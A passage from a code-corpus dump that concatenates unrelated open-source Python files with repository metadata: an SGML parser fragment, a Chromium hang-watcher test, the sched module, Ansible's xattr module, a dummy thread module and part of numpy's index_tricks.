'<%s/' % tag tag = tag.lower() k = match.end(0) self.finish_shorttag(tag, data) self.__starttag_text = rawdata[start_pos:match.end(1) + 1] return k # XXX The following should skip matching quotes (' or ") # As a shortcut way to exit, this isn't so bad, but shouldn't # be used to locate the actual end of the start tag since the # < or > characters may be embedded in an attribute value. match = endbracket.search(rawdata, i+1) if not match: return -1 j = match.start(0) # Now parse the data between i+1 and j into a tag and attrs attrs = [] if rawdata[i:i+2] == '<>': # SGML shorthand: <> == <last open tag seen> k = j tag = self.lasttag else: match = tagfind.match(rawdata, i+1) if not match: self.error('unexpected call to parse_starttag') k = match.end(0) tag = rawdata[i+1:k].lower() self.lasttag = tag while k < j: match = attrfind.match(rawdata, k) if not match: break attrname, rest, attrvalue = match.group(1, 2, 3) if not rest: attrvalue = attrname else: if (attrvalue[:1] == "'" == attrvalue[-1:] or attrvalue[:1] == '"' == attrvalue[-1:]): # strip quotes attrvalue = attrvalue[1:-1] attrvalue = self.entity_or_charref.sub( self._convert_ref, attrvalue) attrs.append((attrname.lower(), attrvalue)) k = match.end(0) if rawdata[j] == '>': j = j+1 self.__starttag_text = rawdata[start_pos:j] self.finish_starttag(tag, attrs) return j # Internal -- convert entity or character reference def _convert_ref(self, match): if match.group(2): return self.convert_charref(match.group(2)) or \ '&#%s%s' % match.groups()[1:] elif match.group(3): return self.convert_entityref(match.group(1)) or \ '&%s;' % match.group(1) else: return '&%s' % match.group(1) # Internal -- parse endtag def parse_endtag(self, i): rawdata = self.rawdata match = endbracket.search(rawdata, i+1) if not match: return -1 j = match.start(0) tag = rawdata[i+2:j].strip().lower() if rawdata[j] == '>': j = j+1 self.finish_endtag(tag) return j # Internal -- finish parsing of <tag/data/ (same as <tag>data</tag>) def finish_shorttag(self, tag, data): self.finish_starttag(tag, []) self.handle_data(data) self.finish_endtag(tag) # Internal -- finish processing of start tag # Return -1 for unknown tag, 0 for open-only tag, 1 for balanced tag def finish_starttag(self, tag, attrs): try: method = getattr(self, 'start_' + tag) except AttributeError: try: method = getattr(self, 'do_' + tag) except AttributeError: self.unknown_starttag(tag, attrs) return -1 else: self.handle_starttag(tag, method, attrs) return 0 else: self.stack.append(tag) self.handle_starttag(tag, method, attrs) return 1 # Internal -- finish processing of end tag def finish_endtag(self, tag): if not tag: found = len(self.stack) - 1 if found < 0: self.unknown_endtag(tag) return else: if tag not in self.stack: try: method = getattr(self, 'end_' + tag) except AttributeError: self.unknown_endtag(tag) else: self.report_unbalanced(tag) return found = len(self.stack) for i in range(found): if self.stack[i] == tag: found = i while len(self.stack) > found: tag = self.stack[-1] try: method = getattr(self, 'end_' + tag) except AttributeError: method = None if method: self.handle_endtag(tag, method) else: self.unknown_endtag(tag) del self.stack[-1] # Overridable -- handle start tag def handle_starttag(self, tag, method, attrs): method(attrs) # Overridable -- handle end tag def handle_endtag(self, tag, method): method() # Example -- report an unbalanced </...> tag. def report_unbalanced(self, tag): if self.verbose: print('*** Unbalanced </' + tag + '>') print('*** Stack:', self.stack) def convert_charref(self, name): """Convert character reference, may be overridden.""" try: n = int(name) except ValueError: return if not 0 <= n <= 127: return return self.convert_codepoint(n) def convert_codepoint(self, codepoint): return chr(codepoint) def handle_charref(self, name): """Handle character reference, no need to override.""" replacement = self.convert_charref(name) if replacement is None: self.unknown_charref(name) else: self.handle_data(replacement) # Definition of entities -- derived classes may override entitydefs = \ {'lt': '<', 'gt': '>', 'amp': '&', 'quot': '"', 'apos': '\''} def convert_entityref(self, name): """Convert entity references. As an alternative to overriding this method; one can tailor the results by setting up the self.entitydefs mapping appropriately. """ table = self.entitydefs if name in table: return table[name] else: return def handle_entityref(self, name): """Handle entity references, no need to override.""" replacement = self.convert_entityref(name) if replacement is None: self.unknown_entityref(name) else: self.handle_data(replacement) # Example -- handle data, should be overridden def handle_data(self, data): pass # Example -- handle comment, could be overridden def handle_comment(self, data): pass # Example -- handle declaration, could be overridden def handle_decl(self, decl): pass # Example -- handle processing instruction, could be overridden def handle_pi(self, data): pass # To be overridden -- handlers for unknown objects def unknown_starttag(self, tag, attrs): pass def unknown_endtag(self, tag): pass def unknown_charref(self, ref): pass def unknown_entityref(self, ref): pass class TestSGMLParser(SGMLParser): def __init__(self, verbose=0): self.testdata = "" SGMLParser.__init__(self, verbose) def handle_data(self, data): self.testdata = self.testdata + data if len(repr(self.testdata)) >= 70: self.flush() def flush(self): data = self.testdata if data: self.testdata = "" print('data:', repr(data)) def handle_comment(self, data): self.flush() r = repr(data) if len(r) > 68: r = r[:32] + '...' + r[-32:] print('comment:', r) def unknown_starttag(self, tag, attrs): self.flush() if not attrs: print('start tag: <' + tag + '>') else: print('start tag: <' + tag) for name, value in attrs: print(name + '=' + '"' + value + '"') print('>') def unknown_endtag(self, tag): self.flush() print('end tag: </' + tag + '>') def unknown_entityref(self, ref): self.flush() print('*** unknown entity ref: &' + ref + ';') def unknown_charref(self, ref): self.flush() print('*** unknown char ref: &#' + ref + ';') def unknown_decl(self, data): self.flush() print('*** unknown decl: [' + data + ']') def close(self): SGMLParser.close(self) self.flush() def test(args = None): import sys if args is None: args = sys.argv[1:] if args and args[0] == '-s': args = args[1:] klass = SGMLParser else: klass = TestSGMLParser if args: file = args[0] else: file = 'test.html' if file == '-': f = sys.stdin else: try: f = open(file, 'r') except IOError as msg: print(file, ":", msg) sys.exit(1) data = f.read() if f is not sys.stdin: f.close() x = klass() for c in data: x.feed(c) x.close() if __name__ == '__main__': test()
gpl-3.0
danakj/chromium
chrome/test/kasko/hang_watcher_integration_test.py
9
1883
#!/usr/bin/env python # Copyright 2016 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """A Windows-only end-to-end integration test for the Chrome hang watcher. This test ensures that the hang watcher is able to detect when Chrome hangs and to generate a Kasko report. The report is then delivered to a locally hosted test crash server. If a crash report is received then all is well. Note that this test only works against non-component Release and Official builds of Chrome with Chrome branding, and attempting to use it with anything else will most likely lead to constant failures. Typical usage (assuming in root 'src' directory): - generate project files with the following build variables: GYP variables: branding=Chrome kasko_hang_reports=1 GN variables: target_cpu = "x86" is_debug = false is_chrome_branded = true enable_kasko_hang_reports = true - build the release Chrome binaries: ninja -C {build_dir} chrome.exe chromedriver.exe - run the test: python chrome/test/kasko/hang_watcher_integration_test.py --chrome={build_dir}\chrome.exe """ import logging import os import sys # Bring in the Kasko module. KASKO_DIR = os.path.join(os.path.dirname(__file__), 'py') sys.path.append(KASKO_DIR) import kasko _LOGGER = logging.getLogger(os.path.basename(__file__)) def Main(): options = kasko.config.ParseCommandLine() kasko.integration_test.RunTest( options, 'chrome://delayeduithreadhang', 120, { 'hung-process': 'DumpHungBrowserProcess()', 'hung-process-is-deadlock': 'GetThreadWaitChain()', 'hung-process-wait-chain-00': 'GetThreadWaitChain()', }) _LOGGER.info('Test passed successfully!') return 0 if __name__ == '__main__': sys.exit(Main())
bsd-3-clause
gameduell/duell
bin/mac/python2.7.9/lib/python2.7/sched.py
175
5088
"""A generally useful event scheduler class. Each instance of this class manages its own queue. No multi-threading is implied; you are supposed to hack that yourself, or use a single instance per application. Each instance is parametrized with two functions, one that is supposed to return the current time, one that is supposed to implement a delay. You can implement real-time scheduling by substituting time and sleep from built-in module time, or you can implement simulated time by writing your own functions. This can also be used to integrate scheduling with STDWIN events; the delay function is allowed to modify the queue. Time can be expressed as integers or floating point numbers, as long as it is consistent. Events are specified by tuples (time, priority, action, argument). As in UNIX, lower priority numbers mean higher priority; in this way the queue can be maintained as a priority queue. Execution of the event means calling the action function, passing it the argument sequence in "argument" (remember that in Python, multiple function arguments are be packed in a sequence). The action function may be an instance method so it has another way to reference private data (besides global variables). """ # XXX The timefunc and delayfunc should have been defined as methods # XXX so you can define new kinds of schedulers using subclassing # XXX instead of having to define a module or class just to hold # XXX the global state of your particular time and delay functions. import heapq from collections import namedtuple __all__ = ["scheduler"] Event = namedtuple('Event', 'time, priority, action, argument') class scheduler: def __init__(self, timefunc, delayfunc): """Initialize a new instance, passing the time and delay functions""" self._queue = [] self.timefunc = timefunc self.delayfunc = delayfunc def enterabs(self, time, priority, action, argument): """Enter a new event in the queue at an absolute time. Returns an ID for the event which can be used to remove it, if necessary. """ event = Event(time, priority, action, argument) heapq.heappush(self._queue, event) return event # The ID def enter(self, delay, priority, action, argument): """A variant that specifies the time as a relative time. This is actually the more commonly used interface. """ time = self.timefunc() + delay return self.enterabs(time, priority, action, argument) def cancel(self, event): """Remove an event from the queue. This must be presented the ID as returned by enter(). If the event is not in the queue, this raises ValueError. """ self._queue.remove(event) heapq.heapify(self._queue) def empty(self): """Check whether the queue is empty.""" return not self._queue def run(self): """Execute events until the queue is empty. When there is a positive delay until the first event, the delay function is called and the event is left in the queue; otherwise, the event is removed from the queue and executed (its action function is called, passing it the argument). If the delay function returns prematurely, it is simply restarted. It is legal for both the delay function and the action function to modify the queue or to raise an exception; exceptions are not caught but the scheduler's state remains well-defined so run() may be called again. A questionable hack is added to allow other threads to run: just after an event is executed, a delay of 0 is executed, to avoid monopolizing the CPU when other threads are also runnable. """ # localize variable access to minimize overhead # and to improve thread safety q = self._queue delayfunc = self.delayfunc timefunc = self.timefunc pop = heapq.heappop while q: time, priority, action, argument = checked_event = q[0] now = timefunc() if now < time: delayfunc(time - now) else: event = pop(q) # Verify that the event was not removed or altered # by another thread after we last looked at q[0]. if event is checked_event: action(*argument) delayfunc(0) # Let other threads run else: heapq.heappush(q, event) @property def queue(self): """An ordered list of upcoming events. Events are named tuples with fields for: time, priority, action, arguments """ # Use heapq to sort the queue rather than using 'sorted(self._queue)'. # With heapq, two events scheduled at the same time will show in # the actual order they would be retrieved. events = self._queue[:] return map(heapq.heappop, [events]*len(events))
bsd-2-clause
alexlo03/ansible
lib/ansible/modules/files/xattr.py
30
6842
#!/usr/bin/python # Copyright: (c) 2017, Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['stableinterface'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: xattr version_added: "1.3" short_description: Manage user defined extended attributes description: - Manages filesystem user defined extended attributes, requires that they are enabled on the target filesystem and that the setfattr/getfattr utilities are present. options: path: description: - The full path of the file/object to get the facts of. - Before 2.3 this option was only usable as I(name). aliases: [ name ] required: true namespace: description: - Namespace of the named name/key. default: user version_added: "2.7" key: description: - The name of a specific Extended attribute key to set/retrieve. value: description: - The value to set the named name/key to, it automatically sets the C(state) to 'set'. state: description: - defines which state you want to do. C(read) retrieves the current value for a C(key) (default) C(present) sets C(name) to C(value), default if value is set C(all) dumps all data C(keys) retrieves all keys C(absent) deletes the key choices: [ absent, all, keys, present, read ] default: read follow: description: - If C(yes), dereferences symlinks and sets/gets attributes on symlink target, otherwise acts on symlink itself. type: bool default: 'yes' notes: - As of Ansible 2.3, the I(name) option has been changed to I(path) as default, but I(name) still works as well. author: - Brian Coca (@bcoca) ''' EXAMPLES = ''' - name: Obtain the extended attributes of /etc/foo.conf xattr: path: /etc/foo.conf - name: Set the key 'user.foo' to value 'bar' xattr: path: /etc/foo.conf key: foo value: bar - name: Set the key 'trusted.glusterfs.volume-id' to value '0x817b94343f164f199e5b573b4ea1f914' xattr: path: /mnt/bricks/brick1 namespace: trusted key: glusterfs.volume-id value: "0x817b94343f164f199e5b573b4ea1f914" - name: Remove the key 'user.foo' xattr: path: /etc/foo.conf key: foo state: absent - name: Remove the key 'trusted.glusterfs.volume-id' xattr: path: /mnt/bricks/brick1 namespace: trusted key: glusterfs.volume-id state: absent ''' import os # import module snippets from ansible.module_utils.basic import AnsibleModule from ansible.module_utils._text import to_native def get_xattr_keys(module, path, follow): cmd = [module.get_bin_path('getfattr', True)] # prevents warning and not sure why it's not default cmd.append('--absolute-names') if not follow: cmd.append('-h') cmd.append(path) return _run_xattr(module, cmd) def get_xattr(module, path, key, follow): cmd = [module.get_bin_path('getfattr', True)] # prevents warning and not sure why it's not default cmd.append('--absolute-names') if not follow: cmd.append('-h') if key is None: cmd.append('-d') else: cmd.append('-n %s' % key) cmd.append(path) return _run_xattr(module, cmd, False) def set_xattr(module, path, key, value, follow): cmd = [module.get_bin_path('setfattr', True)] if not follow: cmd.append('-h') cmd.append('-n %s' % key) cmd.append('-v %s' % value) cmd.append(path) return _run_xattr(module, cmd) def rm_xattr(module, path, key, follow): cmd = [module.get_bin_path('setfattr', True)] if not follow: cmd.append('-h') cmd.append('-x %s' % key) cmd.append(path) return _run_xattr(module, cmd, False) def _run_xattr(module, cmd, check_rc=True): try: (rc, out, err) = module.run_command(' '.join(cmd), check_rc=check_rc) except Exception as e: module.fail_json(msg="%s!" % to_native(e)) # result = {'raw': out} result = {} for line in out.splitlines(): if line.startswith('#') or line == '': pass elif '=' in line: (key, val) = line.split('=') result[key] = val.strip('"') else: result[line] = '' return result def main(): module = AnsibleModule( argument_spec=dict( path=dict(type='path', required=True, aliases=['name']), namespace=dict(type='str', default='user'), key=dict(type='str'), value=dict(type='str'), state=dict(type='str', default='read', choices=['absent', 'all', 'keys', 'present', 'read']), follow=dict(type='bool', default=True), ), supports_check_mode=True, ) path = module.params.get('path') namespace = module.params.get('namespace') key = module.params.get('key') value = module.params.get('value') state = module.params.get('state') follow = module.params.get('follow') if not os.path.exists(path): module.fail_json(msg="path not found or not accessible!") changed = False msg = "" res = {} if key is None and state in ['absent', 'present']: module.fail_json(msg="%s needs a key parameter" % state) # Prepend the key with the namespace if defined if ( key is not None and namespace is not None and len(namespace) > 0 and not (namespace == 'user' and key.startswith('user.'))): key = '%s.%s' % (namespace, key) if (state == 'present' or value is not None): current = get_xattr(module, path, key, follow) if current is None or key not in current or value != current[key]: if not module.check_mode: res = set_xattr(module, path, key, value, follow) changed = True res = current msg = "%s set to %s" % (key, value) elif state == 'absent': current = get_xattr(module, path, key, follow) if current is not None and key in current: if not module.check_mode: res = rm_xattr(module, path, key, follow) changed = True res = current msg = "%s removed" % (key) elif state == 'keys': res = get_xattr_keys(module, path, follow) msg = "returning all keys" elif state == 'all': res = get_xattr(module, path, None, follow) msg = "dumping all" else: res = get_xattr(module, path, key, follow) msg = "returning %s" % key module.exit_json(changed=changed, msg=msg, xattr=res) if __name__ == '__main__': main()
gpl-3.0
40223250/2015cd_midterm2
static/Brython3.1.1-20150328-091302/Lib/_dummy_thread.py
742
4769
"""Drop-in replacement for the thread module. Meant to be used as a brain-dead substitute so that threaded code does not need to be rewritten for when the thread module is not present. Suggested usage is:: try: import _thread except ImportError: import _dummy_thread as _thread """ # Exports only things specified by thread documentation; # skipping obsolete synonyms allocate(), start_new(), exit_thread(). __all__ = ['error', 'start_new_thread', 'exit', 'get_ident', 'allocate_lock', 'interrupt_main', 'LockType'] # A dummy value TIMEOUT_MAX = 2**31 # NOTE: this module can be imported early in the extension building process, # and so top level imports of other modules should be avoided. Instead, all # imports are done when needed on a function-by-function basis. Since threads # are disabled, the import lock should not be an issue anyway (??). error = RuntimeError def start_new_thread(function, args, kwargs={}): """Dummy implementation of _thread.start_new_thread(). Compatibility is maintained by making sure that ``args`` is a tuple and ``kwargs`` is a dictionary. If an exception is raised and it is SystemExit (which can be done by _thread.exit()) it is caught and nothing is done; all other exceptions are printed out by using traceback.print_exc(). If the executed function calls interrupt_main the KeyboardInterrupt will be raised when the function returns. """ if type(args) != type(tuple()): raise TypeError("2nd arg must be a tuple") if type(kwargs) != type(dict()): raise TypeError("3rd arg must be a dict") global _main _main = False try: function(*args, **kwargs) except SystemExit: pass except: import traceback traceback.print_exc() _main = True global _interrupt if _interrupt: _interrupt = False raise KeyboardInterrupt def exit(): """Dummy implementation of _thread.exit().""" raise SystemExit def get_ident(): """Dummy implementation of _thread.get_ident(). Since this module should only be used when _threadmodule is not available, it is safe to assume that the current process is the only thread. Thus a constant can be safely returned. """ return -1 def allocate_lock(): """Dummy implementation of _thread.allocate_lock().""" return LockType() def stack_size(size=None): """Dummy implementation of _thread.stack_size().""" if size is not None: raise error("setting thread stack size not supported") return 0 class LockType(object): """Class implementing dummy implementation of _thread.LockType. Compatibility is maintained by maintaining self.locked_status which is a boolean that stores the state of the lock. Pickling of the lock, though, should not be done since if the _thread module is then used with an unpickled ``lock()`` from here problems could occur from this class not having atomic methods. """ def __init__(self): self.locked_status = False def acquire(self, waitflag=None, timeout=-1): """Dummy implementation of acquire(). For blocking calls, self.locked_status is automatically set to True and returned appropriately based on value of ``waitflag``. If it is non-blocking, then the value is actually checked and not set if it is already acquired. This is all done so that threading.Condition's assert statements aren't triggered and throw a little fit. """ if waitflag is None or waitflag: self.locked_status = True return True else: if not self.locked_status: self.locked_status = True return True else: if timeout > 0: import time time.sleep(timeout) return False __enter__ = acquire def __exit__(self, typ, val, tb): self.release() def release(self): """Release the dummy lock.""" # XXX Perhaps shouldn't actually bother to test? Could lead # to problems for complex, threaded code. if not self.locked_status: raise error self.locked_status = False return True def locked(self): return self.locked_status # Used to signal that interrupt_main was called in a "thread" _interrupt = False # True when not executing in a "thread" _main = True def interrupt_main(): """Set _interrupt flag to True to have start_new_thread raise KeyboardInterrupt upon exiting.""" if _main: raise KeyboardInterrupt else: global _interrupt _interrupt = True
agpl-3.0
381426068/MissionPlanner
Lib/site-packages/numpy/lib/index_tricks.py
53
26635
__all__ = ['unravel_index', 'mgrid', 'ogrid', 'r_', 'c_', 's_', 'index_exp', 'ix_', 'ndenumerate','ndindex', 'fill_diagonal','diag_indices','diag_indices_from'] import sys import numpy.core.numeric as _nx from numpy.core.numeric import ( asarray, ScalarType, array, alltrue, cumprod, arange ) from numpy.core.numerictypes import find_common_type import math import function_base import numpy.matrixlib as matrix from function_base import diff makemat = matrix.matrix # contributed by Stefan van der Walt def unravel_index(x,dims): """ Convert a flat index to an index tuple for an array of given shape. Parameters ---------- x : int Flattened index. dims : tuple of ints Input shape, the shape of an array into which indexing is required. Returns ------- idx : tuple of ints Tuple of the same shape as `dims`, containing the unraveled index. Notes ----- In the Examples section, since ``arr.flat[x] == arr.max()`` it may be easier to use flattened indexing than to re-map the index to a tuple. Examples -------- >>> arr = np.arange(20).reshape(5, 4) >>> arr array([[ 0, 1, 2, 3], [ 4, 5, 6, 7], [ 8, 9, 10, 11], [12, 13, 14, 15], [16, 17, 18, 19]]) >>> x = arr.argmax() >>> x 19 >>> dims = arr.shape >>> idx = np.unravel_index(x, dims) >>> idx (4, 3) >>> arr[idx] == arr.max() True """ if x > _nx.prod(dims)-1 or x < 0: raise ValueError("Invalid index, must be 0 <= x <= number of elements.") idx = _nx.empty_like(dims) # Take dimensions # [a,b,c,d] # Reverse and drop first element # [d,c,b] # Prepend [1] # [1,d,c,b] # Calculate cumulative product # [1,d,dc,dcb] # Reverse # [dcb,dc,d,1] dim_prod = _nx.cumprod([1] + list(dims)[:0:-1])[::-1] # Indices become [x/dcb % a, x/dc % b, x/d % c, x/1 % d] return tuple(x//dim_prod % dims) def ix_(*args): """ Construct an open mesh from multiple sequences. This function takes N 1-D sequences and returns N outputs with N dimensions each, such that the shape is 1 in all but one dimension and the dimension with the non-unit shape value cycles through all N dimensions. Using `ix_` one can quickly construct index arrays that will index the cross product. ``a[np.ix_([1,3],[2,5])]`` returns the array ``[[a[1,2] a[1,5]], [a[3,2] a[3,5]]]``. Parameters ---------- args : 1-D sequences Returns ------- out : tuple of ndarrays N arrays with N dimensions each, with N the number of input sequences. Together these arrays form an open mesh. See Also -------- ogrid, mgrid, meshgrid Examples -------- >>> a = np.arange(10).reshape(2, 5) >>> a array([[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]]) >>> ixgrid = np.ix_([0,1], [2,4]) >>> ixgrid (array([[0], [1]]), array([[2, 4]])) >>> ixgrid[0].shape, ixgrid[1].shape ((2, 1), (1, 2)) >>> a[ixgrid] array([[2, 4], [7, 9]]) """ out = [] nd = len(args) baseshape = [1]*nd for k in range(nd): new = _nx.asarray(args[k]) if (new.ndim != 1): raise ValueError, "Cross index must be 1 dimensional" if issubclass(new.dtype.type, _nx.bool_): new = new.nonzero()[0] baseshape[k] = len(new) new = new.reshape(tuple(baseshape)) out.append(new) baseshape[k] = 1 return tuple(out) class nd_grid(object): """ Construct a multi-dimensional "meshgrid". ``grid = nd_grid()`` creates an instance which will return a mesh-grid when indexed. The dimension and number of the output arrays are equal to the number of indexing dimensions. If the step length is not a complex number, then the stop is not inclusive. However, if the step length is a **complex number** (e.g. 5j), then the integer part of its magnitude is interpreted as specifying the number of points to create between the start and stop values, where the stop value **is inclusive**. If instantiated with an argument of ``sparse=True``, the mesh-grid is open (or not fleshed out) so that only one-dimension of each returned argument is greater than 1. Parameters ---------- sparse : bool, optional Whether the grid is sparse or not. Default is False. Notes ----- Two instances of `nd_grid` are made available in the NumPy namespace, `mgrid` and `ogrid`:: mgrid = nd_grid(sparse=False) ogrid = nd_grid(sparse=True) Users should use these pre-defined instances instead of using `nd_grid` directly. Examples -------- >>> mgrid = np.lib.index_tricks.nd_grid() >>> mgrid[0:5,0:5] array([[[0, 0, 0, 0, 0], [1, 1, 1, 1, 1], [2, 2, 2, 2, 2], [3, 3, 3, 3, 3], [4, 4, 4, 4, 4]], [[0, 1, 2, 3, 4], [0, 1, 2, 3, 4], [0, 1, 2, 3, 4], [0, 1, 2, 3, 4], [0, 1, 2, 3, 4]]]) >>> mgrid[-1:1:5j] array([-1. , -0.5, 0. , 0.5, 1. ]) >>> ogrid = np.lib.index_tricks.nd_grid(sparse=True) >>> ogrid[0:5,0:5] [array([[0], [1], [2], [3], [4]]), array([[0, 1, 2, 3, 4]])] """ def __init__(self, sparse=False): self.sparse = sparse def __getitem__(self,key): try: size = [] typ = int for k in range(len(key)): step = key[k].step start = key[k].start if start is None: start=0 if step is None: step=1 if isinstance(step, complex): size.append(int(abs(step))) typ = float else: size.append(math.ceil((key[k].stop - start)/(step*1.0))) if isinstance(step, float) or \ isinstance(start, float) or \ isinstance(key[k].stop, float): typ = float if self.sparse: nn = map(lambda x,t: _nx.arange(x, dtype=t), size, \ (typ,)*len(size)) else: nn = _nx.indices(size, typ) for k in range(len(size)): step = key[k].step start = key[k].start if start is None: start=0 if step is None: step=1 if isinstance(step, complex): step = int(abs(step)) if step != 1: step = (key[k].stop - start)/float(step-1) nn[k] = (nn[k]*step+start) if self.sparse: slobj = [_nx.newaxis]*len(size) for k in range(len(size)): slobj[k] = slice(None,None) nn[k] = nn[k][slobj] slobj[k] = _nx.newaxis return nn except (IndexError, TypeError): step = key.step stop = key.stop start = key.start if start is None: start = 0 if isinstance(step, complex): step = abs(step) length = int(step) if step != 1: step = (key.stop-start)/float(step-1) stop = key.stop+step return _nx.arange(0, length,1, float)*step + start else: return _nx.arange(start, stop, step) def __getslice__(self,i,j): return _nx.arange(i,j) def __len__(self): return 0 mgrid = nd_grid(sparse=False) ogrid = nd_grid(sparse=True) mgrid.__doc__ = None # set in numpy.add_newdocs ogrid.__doc__ = None # set in numpy.add_newdocs class AxisConcatenator(object): """ Translates slice objects to concatenation along an axis. For detailed documentation on usage, see `r_`. """ def _retval(self, res): if self.matrix: oldndim = res.ndim res = makemat(res) if oldndim == 1 and self.col: res = res.T self.axis = self._axis self.matrix = self._matrix self.col = 0 return res def __init__(self, axis=0, matrix=False, ndmin=1, trans1d=-1): self._axis = axis self._matrix = matrix self.axis = axis self.matrix = matrix self.col = 0 self.trans1d = trans1d self.ndmin = ndmin def __getitem__(self,key): trans1d = self.trans1d ndmin = self.ndmin if isinstance(key, str): frame = sys._getframe().f_back mymat = matrix.bmat(key,frame.f_globals,frame.f_locals) return mymat if type(key) is not tuple: key = (key,) objs = [] scalars = [] arraytypes = [] scalartypes = [] for k in range(len(key)): scalar = False if type(key[k]) is slice: step = key[k].step start = key[k].start stop = key[k].stop if start is None: start = 0 if step is None: step = 1 if isinstance(step, complex): size = int(abs(step)) newobj = function_base.linspace(start, stop, num=size) else: newobj = _nx.arange(start, stop, step) if ndmin > 1: newobj = array(newobj,copy=False,ndmin=ndmin) if trans1d != -1: newobj = newobj.swapaxes(-1,trans1d) elif isinstance(key[k],str): if k != 0: raise ValueError, "special directives must be the"\ "first entry." key0 = key[0] if key0 in 'rc': self.matrix = True self.col = (key0 == 'c') continue if ',' in key0: vec = key0.split(',') try: self.axis, ndmin = \ [int(x) for x in vec[:2]] if len(vec) == 3: trans1d = int(vec[2]) continue except: raise ValueError, "unknown special directive" try: self.axis = int(key[k]) continue except (ValueError, TypeError): raise ValueError, "unknown special directive" elif type(key[k]) in ScalarType: newobj = array(key[k],ndmin=ndmin) scalars.append(k) scalar = True scalartypes.append(newobj.dtype) else: newobj = key[k] if ndmin > 1: tempobj = array(newobj, copy=False, subok=True) newobj = array(newobj, copy=False, subok=True, ndmin=ndmin) if trans1d != -1 and tempobj.ndim < ndmin: k2 = ndmin-tempobj.ndim if (trans1d < 0): trans1d += k2 + 1 defaxes = range(ndmin) k1 = trans1d axes = defaxes[:k1] + defaxes[k2:] + \ defaxes[k1:k2] newobj = newobj.transpose(axes) del tempobj objs.append(newobj) if not scalar and isinstance(newobj, _nx.ndarray): arraytypes.append(newobj.dtype) # Esure that scalars won't up-cast unless warranted final_dtype = find_common_type(arraytypes, scalartypes) if final_dtype is not None: for k in scalars: objs[k] = objs[k].astype(final_dtype) res = _nx.concatenate(tuple(objs),axis=self.axis) return self._retval(res) def __getslice__(self,i,j): res = _nx.arange(i,j) return self._retval(res) def __len__(self): return 0 # separate classes are used here instead of just making r_ = concatentor(0), # etc. because otherwise we couldn't get the doc string to come out right # in help(r_) class RClass(AxisConcatenator): """ Translates slice objects to concatenation along the first axis. This is a simple way to build up arrays quickly. There are two use cases. 1. If the index expression contains comma separated arrays, then stack them along their first axis. 2. If the index expression contains slice notation or scalars then create a 1-D array with a range indicated by the slice notation. If slice notation is used, the syntax ``start:stop:step`` is equivalent to ``np.arange(start, stop, step)`` inside of the brackets. However, if ``step`` is an imaginary number (i.e. 100j) then its integer portion is interpreted as a number-of-points desired and the start and stop are inclusive. In other words ``start:stop:stepj`` is interpreted as ``np.linspace(start, stop, step, endpoint=1)`` inside of the brackets. After expansion of slice notation, all comma separated sequences are concatenated together. Optional character strings placed as the first element of the index expression can be used to change the output. The strings 'r' or 'c' result in matrix output. If the result is 1-D and 'r' is specified a 1 x N (row) matrix is produced. If the result is 1-D and 'c' is specified, then a N x 1 (column) matrix is produced. If the result is 2-D then both provide the same matrix result. A string integer specifies which axis to stack multiple comma separated arrays along. A string of two comma-separated integers allows indication of the minimum number of dimensions to force each entry into as the second integer (the axis to concatenate along is still the first integer). A string with three comma-separated integers allows specification of the axis to concatenate along, the minimum number of dimensions to force the entries to, and which axis should contain the start of the arrays which are less than the specified number of dimensions. In other words the third integer allows you to specify where the 1's should be placed in the shape of the arrays that have their shapes upgraded. By default, they are placed in the front of the shape tuple. The third argument allows you to specify where the start of the array should be instead. Thus, a third argument of '0' would place the 1's at the end of the array shape. Negative integers specify where in the new shape tuple the last dimension of upgraded arrays should be placed, so the default is '-1'. Parameters ---------- Not a function, so takes no parameters Returns ------- A concatenated ndarray or matrix. See Also -------- concatenate : Join a sequence of arrays together. c_ : Translates slice objects to concatenation along the second axis. Examples -------- >>> np.r_[np.array([1,2,3]), 0, 0, np.array([4,5,6])] array([1, 2, 3, 0, 0, 4, 5, 6]) >>> np.r_[-1:1:6j, [0]*3, 5, 6] array([-1. , -0.6, -0.2, 0.2, 0.6, 1. , 0. , 0. , 0. , 5. , 6. ]) String integers specify the axis to concatenate along or the minimum number of dimensions to force entries into. >>> a = np.array([[0, 1, 2], [3, 4, 5]]) >>> np.r_['-1', a, a] # concatenate along last axis array([[0, 1, 2, 0, 1, 2], [3, 4, 5, 3, 4, 5]]) >>> np.r_['0,2', [1,2,3], [4,5,6]] # concatenate along first axis, dim>=2 array([[1, 2, 3], [4, 5, 6]]) >>> np.r_['0,2,0', [1,2,3], [4,5,6]] array([[1], [2], [3], [4], [5], [6]]) >>> np.r_['1,2,0', [1,2,3], [4,5,6]] array([[1, 4], [2, 5], [3, 6]]) Using 'r' or 'c' as a first string argument creates a matrix. >>> np.r_['r',[1,2,3], [4,5,6]] matrix([[1, 2, 3, 4, 5, 6]]) """ def __init__(self): AxisConcatenator.__init__(self, 0) r_ = RClass() class CClass(AxisConcatenator): """ Translates slice objects to concatenation along the second axis. This is short-hand for ``np.r_['-1,2,0', index expression]``, which is useful because of its common occurrence. In particular, arrays will be stacked along their last axis after being upgraded to at least 2-D with 1's post-pended to the shape (column vectors made out of 1-D arrays). For detailed documentation, see `r_`. Examples -------- >>> np.c_[np.array([[1,2,3]]), 0, 0, np.array([[4,5,6]])] array([[1, 2, 3, 0, 0, 4, 5, 6]]) """ def __init__(self): AxisConcatenator.__init__(self, -1, ndmin=2, trans1d=0) c_ = CClass() class ndenumerate(object): """ Multidimensional index iterator. Return an iterator yielding pairs of array coordinates and values. Parameters ---------- a : ndarray Input array. See Also -------- ndindex, flatiter Examples -------- >>> a = np.array([[1, 2], [3, 4]]) >>> for index, x in np.ndenumerate(a): ... print index, x (0, 0) 1 (0, 1) 2 (1, 0) 3 (1, 1) 4 """ def __init__(self, arr): self.iter = asarray(arr).flat def next(self): """ Standard iterator method, returns the index tuple and array value. Returns ------- coords : tuple of ints The indices of the current iteration. val : scalar The array element of the current iteration. """ return self.iter.coords, self.iter.next() def __iter__(self): return self class ndindex(object): """ An N-dimensional iterator object to index arrays. Given the shape of an array, an `ndindex` instance iterates over the N-dimensional index of the array. At each iteration a tuple of indices is returned, the last dimension is iterated over first. Parameters ---------- `*args` : ints The size of each dimension of the array. See Also -------- ndenumerate, flatiter Examples -------- >>> for index in np.ndindex(3, 2, 1): ... print index (0, 0, 0) (0, 1, 